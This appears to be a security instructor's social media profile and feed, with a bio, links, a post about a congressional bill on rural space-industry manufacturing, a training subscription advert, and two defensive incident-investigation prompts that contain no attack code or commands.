Investigation Scenario 🔎
You've discovered winword.exe as the parent process to files matching the following regular expression pattern: [a-z0-9]{4}\.tmp
What do you look for to investigate whether an incident occurred?
Security Analyst, Author, and Instructor, Ed.D.
Studying the intersection of security investigation doctrine, cognitive psychology, and education.
Founder of Applied Network Defense and Rural Tech Fund
Books:
🍯 Intrusion Detection Honeypots
🦈 Practical Packet Analysis
🌐 Applied Network Security Monitoring
Former: Mandiant, InGuardians, Dept of Defense, Roadside Fruit Vendor.
A question well stated is a problem half-solved. #InvestigationTheory
https://chrissanders.org/links/
Blog | https://chrissanders.org/ |
Training Courses | http://networkdefense.co/courses/ |
https://twitter.com/chrissanders88 | |
Books | https://chrissanders.org/publications |
More Links | https://chrissanders.org/links/ |
Investigation Scenario 🔎
You've discovered winword.exe as the parent process to files matching the following regular expression pattern: [a-z0-9]{4}\.tmp
What do you look for to investigate whether an incident occurred?
I had the opportunity to work with Congressman David Scott's office to help craft the Rural American Vitalization in Extraterrestrial Space (RAVES) Reporting Act, which was introduced on the US House of Representatives floor this week.
The bill establishes a study to determine the ability, capacity, and recommendation for transforming rural sites into U.S. space-industry manufacturing hubs.
Details on the bill and a quote of support from me here: https://davidscott.house.gov/news/documentsingle.aspx?DocumentID=400926
The AND Analyst Skills Vault is a subscription-based service that provides access to our growing collection of standalone video lessons built by domain experts. We add new lessons monthly for security analysts, forensic investigators, malware analysts, threat hunters, intelligence analysts, and other defensive security practitioners.
Investigation Scenario 🔎
While reviewing company code in Github, you discover odd javascript that downloads+executes a file from an unknown domain that is currently inaccessible.
What do you look for to investigate whether an incident occurred?